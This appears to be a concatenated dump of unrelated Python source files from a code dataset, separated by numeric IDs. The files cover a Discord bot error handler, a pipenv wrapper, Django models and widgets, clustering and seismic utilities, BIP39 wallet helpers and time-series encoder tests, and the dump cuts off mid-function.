**{'Resolved at' if last_status == 'Resolved' else 'Last updated'}:** {format_dt(last_update, style='F')}
""", color=color)
embed.set_footer(text="Powered by discordstatus.com")
await ctx.respond(embed=embed)
@topic.error
@rule.error
@poll.error
@bypass.error
@cve.error
@dstatus.error
@remindme.error
@jumbo.error
@avatar.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
if (isinstance(error, commands.MissingRequiredArgument)
or isinstance(error, PermissionsFailure)
or isinstance(error, commands.BadArgument)
or isinstance(error, commands.BadUnionArgument)
or isinstance(error, commands.MissingPermissions)
or isinstance(error, commands.BotMissingPermissions)
or isinstance(error, commands.MaxConcurrencyReached)
or isinstance(error, commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@109705860275539968> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Misc(bot))
|
30493
|
import os
import shutil
import subprocess
from possum.exc import PipenvPathNotFound
class PipenvWrapper:
def __init__(self):
self.pipenv_path = shutil.which('pipenv')
if not self.pipenv_path:
raise PipenvPathNotFound
# Force pipenv to ignore any currently active pipenv environment
os.environ['PIPENV_IGNORE_VIRTUALENVS'] = '1'
@property
def venv_path(self):
return self.get_virtual_environment_path()
def create_virtual_environment(self):
p = subprocess.Popen(
[self.pipenv_path, '--three'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
p.communicate()
def get_virtual_environment_path(self):
p = subprocess.Popen(
[self.pipenv_path, '--venv'],
stdout=subprocess.PIPE
)
result = p.communicate()
return result[0].decode('ascii').strip('\n')
def get_site_packages(self):
return subprocess.check_output(
[
'pipenv', 'run', 'python', '-c',
'from distutils.sysconfig import get_python_lib; '
'print(get_python_lib())'
],
universal_newlines=True
).strip()
def install_packages(self):
p = subprocess.Popen(
[self.pipenv_path, 'install'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def remove_virtualenv(self):
p = subprocess.Popen(
[self.pipenv_path, '--rm'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def check_package_title(self, package):
try:
# Yes, this needs to be better, but performing this one-liner
# though the Pipenv environment of the project only seems to work
# when 'shell=True' is set.
return subprocess.check_output(
f'{self.pipenv_path} run python -c "import '
f'{package}; print({package}.__title__)"',
shell=True, universal_newlines=True
).strip()
except subprocess.CalledProcessError:
return package
|
30498
|
class O(object): pass
class A(O): pass
class B(O): pass
class C(O): pass
class D(O): pass
class E(O): pass
class K1(A,B,C): pass
class K2(D,B,E): pass
class K3(D,A): pass
class Z(K1,K2,K3): pass
print K1.__mro__
print K2.__mro__
print K3.__mro__
print Z.__mro__
|
30507
|
from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
TARGET_FKEY_ATTRS = dict(
null=True,
blank=True,
on_delete=models.SET_NULL,
)
class Entry(models.Model):
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL,
null=True,
blank=True,
)
entry_type = models.CharField(max_length=255)
context = models.CharField(
max_length=1024,
blank=True,
default='',
verbose_name=_('Context'),
help_text=_('The URL of the view in which the event occurred.'),
)
ip_address = models.CharField(
max_length=48,
blank=True,
default='',
verbose_name=_('IP address'),
help_text=_('The IP address this action was performed from.'),
)
# various target fkeys, sparse
event = models.ForeignKey('core.Event', **TARGET_FKEY_ATTRS)
person = models.ForeignKey('core.Person', **TARGET_FKEY_ATTRS)
organization = models.ForeignKey('core.Organization', **TARGET_FKEY_ATTRS)
feedback_message = models.ForeignKey('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)
event_survey_result = models.ForeignKey('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)
global_survey_result = models.ForeignKey('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)
search_term = models.CharField(max_length=255, blank=True, default='')
# we should probably have shoved them in a jsonfield in the first place
other_fields = JSONField(blank=True, default=dict)
@property
def survey_result(self):
"""
Shortcut for templates etc. that apply to both GlobalSurveyResults and EventSurveyResults.
"""
return self.event_survey_result if self.event_survey_result else self.global_survey_result
@property
def cbac_claims(self):
return ", ".join(f"{key}={value}" for (key, value) in self.other_fields.get("claims", {}).items())
@property
def signup(self):
from labour.models import Signup
if not self.event or not self.person:
return None
try:
return Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
return None
def send_updates(self):
from .subscription import Subscription
q = Q(entry_type=self.entry_type, active=True)
# TODO need a more flexible filter solution that does not hard-code these
# One option would be to specify filter = JSONField in Subscription.
# Implementing this filter would require a client-side check or one SQL query
# per Subscription, however, as we query Subscriptions by Entry and not vice versa.
if self.event:
# Implement the event filter. Subscriptions without event_filter receive updates from
# all events. Subscriptions with event_filter receive only updates from that event.
q &= Q(event_filter=self.event) | Q(event_filter__isnull=True)
if self.event_survey_result:
# Implement event survey filter.
survey = self.event_survey_result.survey
q &= Q(event_survey_filter=survey) | Q(event_survey_filter__isnull=True)
if self.event and self.person:
# Implement job category filter
from labour.models import Signup
try:
signup = Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
pass
else:
q &= (
Q(job_category_filter__in=signup.job_categories.all()) |
Q(job_category_filter__in=signup.job_categories_accepted.all()) |
Q(job_category_filter__isnull=True)
)
for subscription in Subscription.objects.filter(q):
subscription.send_update_for_entry(self)
@property
def entry_type_metadata(self):
if not hasattr(self, '_entry_type_metadata'):
from .. import registry
self._entry_type_metadata = registry.get(self.entry_type)
return self._entry_type_metadata
@property
def email_reply_to(self):
meta = self.entry_type_metadata
if callable(meta.email_reply_to):
return meta.email_reply_to(self)
else:
return meta.email_reply_to
@property
def message(self):
meta = self.entry_type_metadata
if callable(meta.message):
return meta.message(self)
else:
return meta.message.format(entry=self)
@property
def email_subject(self):
return '[{app_name}] {message}'.format(
app_name=settings.KOMPASSI_INSTALLATION_NAME,
message=self.message,
)
@property
def email_body(self):
meta = self.entry_type_metadata
if callable(meta.email_body_template):
return meta.email_body_template(self)
else:
return render_to_string(meta.email_body_template, dict(
entry=self,
settings=settings,
))
class Meta:
verbose_name = _('log entry')
verbose_name_plural = _('log entries')
ordering = ('-created_at',)
|
30522
|
import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
signer = signing.Signer()
def __init__(self, area_label, fileupload_url, attrs=None):
self.area_label = area_label
self.fileupload_url = fileupload_url
super(DropFileWidget, self).__init__(attrs)
self.filetype = 'file'
def render(self, name, value, attrs=None, renderer=None):
from django.contrib.staticfiles.storage import staticfiles_storage
extra_attrs = dict(attrs)
extra_attrs.update({
'name': name,
'class': 'djng-{}-uploader'.format(self.filetype),
'djng-fileupload-url': self.fileupload_url,
'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
})
self.update_attributes(extra_attrs, value)
final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
# add a spinnging wheel
spinner_attrs = {
'class': 'glyphicon glyphicon-refresh glyphicon-spin',
'ng-cloak': True,
}
elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
# add a delete icon
icon_attrs = {
'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
'class': 'djng-btn-trash',
'title': _("Delete File"),
'djng-fileupload-button ': True,
'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
'ng-cloak': True,
}
elements.append(format_html('<img {} />', flatatt(icon_attrs)))
# add a download icon
if value:
download_attrs = {
'href': value.url,
'class': 'djng-btn-download',
'title': _("Download File"),
'download': True,
'ng-cloak': True,
}
download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
def update_attributes(self, attrs, value):
if value:
try:
content_type, _ = mimetypes.guess_type(value.file.name)
extension = mimetypes.guess_extension(content_type)[1:]
except (IOError, IndexError, TypeError):
extension = '_blank'
background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
class DropImageWidget(DropFileWidget):
def __init__(self, area_label, fileupload_url, attrs=None):
super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
self.filetype = 'image'
def update_attributes(self, attrs, value):
if value:
background_url = self.get_background_url(value)
if background_url:
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
def get_background_url(self, value):
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
try:
thumbnailer = get_thumbnailer(value)
thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
return thumbnail.url
except InvalidImageFormatError:
return
|
30565
|
import datetime
import unittest
class KalmanFilterTest(unittest.TestCase):
def test_kalman_filter_with_prior_predict(self):
t0 = datetime.datetime(2014, 2, 12, 16, 18, 25, 204000)
print(t0)
self.assertEqual(1., 1.)
def test_kalman_filter_without_prior_predict(self):
pass
def test_kalman_filter_with_low_variance_observation(self):
pass
def test_kalman_filter_multidim(self):
pass
if __name__ == '__main__':
unittest.main()
|
30595
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import os
from datasets import convert_data
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('data_type', None,
'The type of the dataset to convert, need to be either "train" or "test".')
tf.app.flags.DEFINE_string('dataset_dir', None,
'The directory where the image files are saved.')
tf.app.flags.DEFINE_string('output_dir', None,
'The directory where the output TFRecords are saved.')
tf.app.flags.DEFINE_string('filename', None,
'The txt file where the list all image files to be converted.')
tf.app.flags.DEFINE_integer('num_tfrecords', 1,
'Number of tfrecords to convert.')
def main(_):
# check if dir exits and make it
directory = FLAGS.output_dir
if not os.path.exists(directory):
os.makedirs(directory)
# start convert data to tfrecords
convert_data.run(dataset_dir=FLAGS.dataset_dir,
output_dir=FLAGS.output_dir,
filename=FLAGS.filename,
data_type=FLAGS.data_type,
num_tfrecords=FLAGS.num_tfrecords)
if __name__ == '__main__':
tf.app.run()
|
30597
|
import logging
import numpy as np
from bico.geometry.point import Point
from bico.nearest_neighbor.base import NearestNeighbor
from bico.utils.ClusteringFeature import ClusteringFeature
from datetime import datetime
from typing import Callable, TextIO, List
logger = logging.getLogger(__name__)
class BICONode:
def __init__(self, level: int, dim: int, proj: int, bico: 'BICO',
projection_func: Callable[[int, int, float], NearestNeighbor]):
self.level = level
self.dim = dim
self.proj = proj
self.point_to_biconode = []
self.projection_func = projection_func
self.nn_engine = projection_func(dim, proj, bico.get_radius(self.level))
self.num_cfs = 0
self.bico = bico
self.cf = ClusteringFeature(Point(np.zeros(dim)), Point(np.zeros(dim)), 0, 0)
def insert_point(self, point_cf: ClusteringFeature) -> int:
if self.bico.verbose:
logger.debug("Insert point: {}".format(point_cf))
# check whether geometry fits into CF
if self.level > 0:
if self.cf.size == 0:
self.cf += point_cf
self.cf.ref = point_cf.ref
else:
test = self.cf + point_cf
cost = test.kmeans_cost(self.cf.ref)
if self.bico.verbose:
logger.debug("Cost: " + str(cost) + ", Thresh: " + str(self.bico.get_threshold(self.level)))
if cost < self.bico.get_threshold(self.level):
self.cf = test
return 0
# search nearest neighbor and insert geometry there or open new BICONode
candidates = []
if self.num_cfs > 0:
if self.bico.track_time:
tstart = datetime.now()
candidates = self.nn_engine.get_candidates(point_cf.ref.p)
# candidates = self.ann_engine.neighbours(point_cf.ref.p)
if self.bico.track_time:
tend = datetime.now()
if len(self.bico.time) < self.level + 1:
self.bico.time.append(tend - tstart)
else:
self.bico.time[self.level] += tend - tstart
if len(candidates) == 0:
if self.bico.verbose:
logger.debug("No nearest neighbor found.")
self.num_cfs += 1
self.nn_engine.insert_candidate(point=point_cf.ref.p, metadata=self.num_cfs)
# self.ann_engine.store_vector(point_cf.ref.p, data=self.num_cfs)
new_node = BICONode(self.level + 1, self.dim, self.proj, self.bico, self.projection_func)
# new_node.cf = ClusteringFeature(geometry, geometry, geometry*geometry, 1)
new_node.cf = point_cf
# debug
if len(self.point_to_biconode) != self.num_cfs - 1:
logger.error("Something is wrong: {} != {}".format(len(self.point_to_biconode), self.num_cfs - 1))
self.point_to_biconode.append(new_node)
return 1
else:
if self.bico.verbose:
logger.debug(str(len(candidates)) + " nearest neighbor found!")
logger.debug(candidates)
nearest = candidates[0]
node = nearest.data # contains the index
# sanity check
if len(self.point_to_biconode) < node - 2:
logger.error("Something is wrong: {} > {}".format(len(self.point_to_biconode), node - 2))
return self.point_to_biconode[node - 1].insert_point(point_cf)
def output_cf(self, f: TextIO) -> None:
if self.level > 0:
f.write(str(self.cf) + "\n")
for node in self.point_to_biconode:
node.output_cf(f)
def get_cf(self) -> List[np.ndarray]:
cur = []
if self.level > 0:
cur.append(np.insert(self.cf.center().p, 0, self.cf.size))
for node in self.point_to_biconode:
cur = cur + node.get_cf()
return cur
|
30674
|
from django.core.exceptions import SuspiciousOperation
from django.core.signing import Signer, BadSignature
from django.forms import HiddenInput
signer = Signer()
class SignedHiddenInput(HiddenInput):
def __init__(self, include_field_name=True, attrs=None):
self.include_field_name = include_field_name
super(SignedHiddenInput, self).__init__(attrs=attrs)
def value_from_datadict(self, data, files, name):
value = super(SignedHiddenInput, self).value_from_datadict(data, files, name)
try:
value = signer.unsign(value)
except BadSignature:
raise SuspiciousOperation()
if self.include_field_name:
name_key = '{0}-'.format(name)
if not value.startswith(name_key):
raise SuspiciousOperation()
value = value.replace(name_key, '', 1)
return value
def render(self, name, value, attrs=None):
value = self.sign_value(name, value)
return super(SignedHiddenInput, self).render(name, value, attrs=attrs)
def sign_value(self, name, value):
if self.include_field_name:
value = '-'.join(map(str, [name, value]))
value = signer.sign(value)
return value
def value(self):
pass
|
30690
|
from typing import Union
from scipy.spatial.qhull import Delaunay
from shapely.geometry import LineString
from subsurface.structs.base_structures import StructuredData
import numpy as np
try:
import segyio
segyio_imported = True
except ImportError:
segyio_imported = False
def read_in_segy(filepath: str, coords=None) -> StructuredData:
"""Reader for seismic data stored in sgy/segy files
Args:
filepath (str): the path of the sgy/segy file
coords (dict): If data is a numpy array coords provides the values for
the xarray dimension. These dimensions are 'x', 'y' and 'z'
Returns: a StructuredData object with data, the traces with samples written into an xr.Dataset, optionally with
labels defined by coords
"""
segyfile = segyio.open(filepath, ignore_geometry=True)
data = np.asarray([np.copy(tr) for tr in segyfile.trace[:]])
sd = StructuredData.from_numpy(data) # data holds traces * (samples per trace) values
segyfile.close()
return sd
def create_mesh_from_coords(coords: Union[dict, LineString],
zmin: Union[float, int], zmax: Union[float, int] = 0.0):
"""Creates a mesh for plotting StructuredData
Args:
coords (Union[dict, LineString]): the x and y, i.e. latitude and longitude, location of the traces of the seismic profile
zmax (float): the maximum elevation of the seismic profile, by default 0.0
zmin (float): the location in z where the lowest sample was taken
Returns: vertices and faces for creating an UnstructuredData object
"""
if type(coords) == LineString:
linestring = coords
n = len(list(linestring.coords))
coords = np.array([[x[0] for x in list(linestring.coords)],
[y[1] for y in list(linestring.coords)]]).T
else:
n = len(coords['x'])
coords = np.array([coords['x'],
coords['y']]).T
# duplicating the line, once with z=lower and another with z=upper values
vertices = np.zeros((2*n, 3))
vertices[:n, :2] = coords
vertices[:n, 2] = zmin
vertices[n:, :2] = coords
vertices[n:, 2] = zmax
# i+n --- i+n+1
# |\ |
# | \ |
# | \ |
# | \ |
# i --- i+1
tri = Delaunay(vertices[:, [0, 2]])
faces = tri.simplices
return vertices, faces
|
30696
|
from pylayers.gis.layout import *
from pylayers.antprop.signature import *
from pylayers.antprop.channel import *
import pylayers.signal.waveform as wvf
import networkx as nx
import numpy as np
import time
import logging
L = Layout('WHERE1_clean.ini')
#L = Layout('defstr2.ini')
try:
L.dumpr()
except:
L.build()
L.dumpw()
#L.build()
#L.dumpw()
#L.buildGi()
nc1 = 6#5
nc2 = 25#37
poly1 = L.Gt.node[nc1]['polyg']
cp1 = poly1.centroid.xy
poly2 = L.Gt.node[nc2]['polyg']
cp2 = poly2.centroid.xy
ptx = np.array([cp1[0][0],cp1[1][0],1.5])
prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5])
print ptx
print prx
d = np.sqrt(np.dot((ptx-prx),(ptx-prx)))
tau = d/0.3
print d,tau
logging.info('Signature')
S = Signatures(L,nc1,nc2)
a =time.time()
logging.info('Calculate signature')
#S.run2(cutoff=6,dcut=3)
S.run(cutoff=2)
b=time.time()
print b-a
for i in L.Gi.nodes():
ei = eval(i)
if type(ei)!= int:
if ei[0] == 354:
print i
#Gsi.add_node('Tx')
#Gsi.pos['Tx']=tuple(ptx[:2])
#for i in L.Gt.node[nc1]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge('Tx',i)
#Gsi.add_node('Rx')
#Gsi.pos['Rx']=tuple(prx[:2])
#for i in L.Gt.node[nc2]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge(i,'Rx')
#print 'signatures'
#co = nx.dijkstra_path_length(Gsi,'Tx','Rx')
#sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2))
#b=time.time()
#print b-a
#f,ax=L.showG('t')
#nx.draw(Gsi,Gsi.pos,ax=ax)
#plt.show()
##S.run(L,metasig,cutoff=3)
#print "r = S.rays "
r = S.rays(ptx,prx)
print "r3 = r.to3D "
r3 = r.to3D()
print "r3.locbas "
r3.locbas(L)
#print "r3.fillinter "
r3.fillinter(L)
r3.show(L)
plt.show()
##
#config = ConfigParser.ConfigParser()
#_filesimul = 'default.ini'
#filesimul = pyu.getlong(_filesimul, "ini")
#config.read(filesimul)
#fGHz = np.linspace(eval(config.get("frequency", "fghzmin")),
# eval(config.get("frequency", "fghzmax")),
# eval(config.get("frequency", "nf")))
#
#Cn=r3.eval(fGHz)
#
#Cn.freq=Cn.fGHz
#sco=Cn.prop2tran(a='theta',b='theta')
#wav = wvf.Waveform()
#ciro = sco.applywavB(wav.sfg)
#
##raynumber = 4
#
##fig=plt.figure('Cpp')
##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
#
##r3d.info(raynumber)
## plt.show()
##
##
##
###
###c11 = r3d.Ctilde[:,:,0,0]
###c12 = r3d.Ctilde[:,:,0,1]
###c21 = r3d.Ctilde[:,:,1,0]
###c22 = r3d.Ctilde[:,:,1,1]
###
###
###
###Cn=Ctilde()
###Cn.Cpp = bs.FUsignal(r3d.I.f, c11)
###Cn.Ctp = bs.FUsignal(r3d.I.f, c12)
###Cn.Cpt = bs.FUsignal(r3d.I.f, c21)
###Cn.Ctt = bs.FUsignal(r3d.I.f, c22)
###Cn.nfreq = r3d.I.nf
###Cn.nray = r3d.nray
###Cn.tauk=r3d.delays
###
###raynumber = 4
###
###fig=plt.figure('Cpp')
###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
###
##
##
##
##
##
##
|
30718
|
from .models import db, User
from m import Router
from m.utils import jsonify
router = Router(prefix='')
@router.route('/', methods=['POST'])
def home(ctx, request):
name = request.json().get('name')
user = User(name=name)
db.session.add(user)
try:
db.session.commit()
except Exception as e:
print(e)
db.session.rollback()
@router.route('/{name}', methods=['GET'])
def get(ctx, request):
name = request.args.get('name')
user = User.query.filter(User.name == name).first_or_404('user {} not exist'.format(name))
return jsonify(code=200, user=user.dictify())
|
30784
|
import wallycore as wally
from . import exceptions
from gaservices.utils import h2b
wordlist_ = wally.bip39_get_wordlist('en')
wordlist = [wally.bip39_get_word(wordlist_, i) for i in range(2048)]
def seed_from_mnemonic(mnemonic_or_hex_seed):
"""Return seed, mnemonic given an input string
mnemonic_or_hex_seed can either be:
- A mnemonic
- A hex seed, with an 'X' at the end, which needs to be stripped
seed will always be returned, mnemonic may be None if a seed was passed
"""
if mnemonic_or_hex_seed.endswith('X'):
mnemonic = None
seed = h2b(mnemonic_or_hex_seed[:-1])
else:
mnemonic = mnemonic_or_hex_seed
written, seed = wally.bip39_mnemonic_to_seed512(mnemonic_or_hex_seed, None)
assert written == wally.BIP39_SEED_LEN_512
assert len(seed) == wally.BIP39_SEED_LEN_512
return seed, mnemonic
def wallet_from_mnemonic(mnemonic_or_hex_seed, ver=wally.BIP32_VER_MAIN_PRIVATE):
"""Generate a BIP32 HD Master Key (wallet) from a mnemonic phrase or a hex seed"""
seed, mnemonic = seed_from_mnemonic(mnemonic_or_hex_seed)
return wally.bip32_key_from_seed(seed, ver, wally.BIP32_FLAG_SKIP_HASH)
def _decrypt_mnemonic(mnemonic, password):
"""Decrypt a 27 word encrypted mnemonic to a 24 word mnemonic"""
mnemonic = ' '.join(mnemonic.split())
entropy = bytearray(wally.BIP39_ENTROPY_LEN_288)
assert wally.bip39_mnemonic_to_bytes(None, mnemonic, entropy) == len(entropy)
salt, encrypted = entropy[32:], entropy[:32]
derived = bytearray(64)
wally.scrypt(password.encode('utf-8'), salt, 16384, 8, 8, derived)
key, decrypted = derived[32:], bytearray(32)
wally.aes(key, encrypted, wally.AES_FLAG_DECRYPT, decrypted)
for i in range(len(decrypted)):
decrypted[i] ^= derived[i]
if wally.sha256d(decrypted)[:4] != salt:
raise exceptions.InvalidMnemonicOrPasswordError('Incorrect password')
return wally.bip39_mnemonic_from_bytes(None, decrypted)
def check_mnemonic_or_hex_seed(mnemonic):
"""Raise an error if mnemonic/hex seed is invalid"""
if ' ' not in mnemonic:
if mnemonic.endswith('X'):
# mnemonic is the hex seed
return
msg = 'Mnemonic words must be separated by spaces, hex seed must end with X'
raise exceptions.InvalidMnemonicOrPasswordError(msg)
for word in mnemonic.split():
if word not in wordlist:
msg = 'Invalid word: {}'.format(word)
raise exceptions.InvalidMnemonicOrPasswordError(msg)
try:
wally.bip39_mnemonic_validate(None, mnemonic)
except ValueError:
raise exceptions.InvalidMnemonicOrPasswordError('Invalid mnemonic checksum')
|
30791
|
from rest_framework import status
from rest_framework.exceptions import APIException
class FeatureStateVersionError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError):
status_code = status.HTTP_400_BAD_REQUEST
def __init__(self, version: int):
super(FeatureStateVersionAlreadyExistsError, self).__init__(
f"Version {version} already exists for FeatureState."
)
|
30793
|
import numpy as np
import pandas as pd
import pytest
from etna.datasets import TSDataset
from etna.datasets import generate_ar_df
from etna.datasets import generate_const_df
from etna.datasets import generate_periodic_df
from etna.metrics import R2
from etna.models import LinearPerSegmentModel
from etna.transforms import FilterFeaturesTransform
from etna.transforms.encoders.categorical import LabelEncoderTransform
from etna.transforms.encoders.categorical import OneHotEncoderTransform
@pytest.fixture
def two_df_with_new_values():
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 5, 9, 5, 9],
"target": [1, 2, 3, 4, 5, 6],
}
df1 = TSDataset.to_dataset(pd.DataFrame(d))
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 9, 5, 0, 0],
"target": [1, 2, 3, 4, 5, 6],
}
df2 = TSDataset.to_dataset(pd.DataFrame(d))
return df1, df2
@pytest.fixture
def df_for_ohe_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test_0"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 5))
answer_on_regressor_0["test_1"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test_0"] = answer_on_regressor_0["test_0"].astype("category")
answer_on_regressor_0["test_1"] = answer_on_regressor_0["test_1"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test_0"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 5))
answer_on_regressor_1["test_1"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test_0"] = answer_on_regressor_1["test_0"].astype("category")
answer_on_regressor_1["test_1"] = answer_on_regressor_1["test_1"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test_0"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 0))
answer_on_regressor_2["test_0"] = answer_on_regressor_2["test_0"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_label_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test"] = answer_on_regressor_0["test"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test"] = answer_on_regressor_1["test"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 1))
answer_on_regressor_2["test"] = answer_on_regressor_2["test"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_naming():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
df_regressors = generate_periodic_df(12, start_time="2021-01-01", scale=10, period=2, n_segments=2)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + ["regressor_1", "2"]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return tsdataset.df
def test_label_encoder_simple(df_for_label_encoding):
"""Test that LabelEncoderTransform works correct in a simple cases."""
df, answers = df_for_label_encoding
for i in range(3):
le = LabelEncoderTransform(in_column=f"regressor_{i}", out_column="test")
le.fit(df)
cols = le.transform(df)["segment_0"].columns
assert le.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_ohe_encoder_simple(df_for_ohe_encoding):
"""Test that OneHotEncoderTransform works correct in a simple case."""
df, answers = df_for_ohe_encoding
for i in range(3):
ohe = OneHotEncoderTransform(in_column=f"regressor_{i}", out_column="test")
ohe.fit(df)
cols = ohe.transform(df)["segment_0"].columns
assert ohe.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_value_error_label_encoder(df_for_label_encoding):
"""Test LabelEncoderTransform with wrong strategy."""
df, _ = df_for_label_encoding
with pytest.raises(ValueError, match="The strategy"):
le = LabelEncoderTransform(in_column="target", strategy="new_vlue")
le.fit(df)
le.transform(df)
@pytest.mark.parametrize(
"strategy, expected_values",
[
("new_value", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, -1, 5], [9, -1, 3, 0, -1, 6]])),
("none", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, np.nan, 5], [9, np.nan, 3, 0, np.nan, 6]])),
("mean", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, 0, 5], [9, 0.5, 3, 0, 0, 6]])),
],
)
def test_new_value_label_encoder(two_df_with_new_values, strategy, expected_values):
"""Test LabelEncoderTransform correct works with unknown values."""
df1, df2 = two_df_with_new_values
le = LabelEncoderTransform(in_column="regressor_0", strategy=strategy)
